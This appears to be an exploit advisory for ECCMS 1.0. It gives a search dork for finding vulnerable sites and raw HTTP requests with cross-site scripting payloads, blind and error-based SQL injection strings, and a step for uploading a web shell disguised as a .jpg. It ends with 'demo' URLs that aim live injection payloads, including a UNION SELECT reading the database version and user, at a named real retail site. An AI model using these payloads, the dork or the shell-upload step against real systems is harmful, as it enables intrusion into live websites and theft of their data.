ECCMS version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities.
9eeb234bbd8787625b39c3f09b64e83fd61a9ce1aa037d29a827c35e31e2de3b
=====================================================================
Advisory: ECCMS 1.0 - Multiple Vulnerabilities
Author: R3VANBASTARD - Yogyakarta
Dork: "Powered by Econnective" / Powered by Econnective inurl:/admin
=====================================================================
Vulnerability Details:
1.) XSS
Request
GET /announcement.php?consist=1&id=3%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28950843%29%3c%2fScRiPt%3e&page=2 HTTP/1.1
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
GET /download_catalog.php/--%3E1%3CScRiPt%3Eprompt(994458)%3C/ScRiPt%3E%3C!-- HTTP/1.1
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
2.) Blind SQLi
Request
GET /product_shop.php?cate=-1%22%20or%20%22102%22%3d%22101&country=Angola&formcountry=search&id=0 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
Request
GET /just_in.php?consist=1&id=-1%20or%2011%3d9&page=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.localhost.com/
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: www.kingarms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
3.) SQLi
GET /product_shop.php?cate=all&country=United%20States&formcountry=search&id=%28select%201%20and%20row%281%2c1%29%3e%28select%20count%28*%29%2cconcat
%28concat%28CHAR%2852%29%2cCHAR%2867%29%2cCHAR%28117%29%2cCHAR%28112%29%2cCHAR%2856%29%2cCHAR%2883%29%2cCHAR%28120%29%2cCHAR%2870%29%2cCHAR%28114%29%2c
CHAR%2882%29%2cCHAR%2856%29%29%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29 HTTP/1.1
Cookie: PHPSESSID=lcsefqdvchidhirh14ss7dujd3
Host: http://www.localhost.com/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
4.) UPLOAD SHELL
Login into admin panel then upload your shell .JPG
http://localhost/upload/banner/file_photo_00088_1421635224.jpg.php
5.) DEMO
http://www.kingarms.com//download_catalog.php/--%3E1%3CScRiPt%3Eprompt%285050515%29%3C/ScRiPt%3E%3C!--
http://www.kingarms.com/product_detail.php?id=35%27+union+all+select+1,2,3,4,5,6,7,version%28%29,user%28%29,10,11,12,13,14,15,16,17,18,19,20,21%20and%20%270%27=%270--
===============================================
Thanks to:
- Research And Development Center (RNDC.or.id)
- Yoga0400
===============================================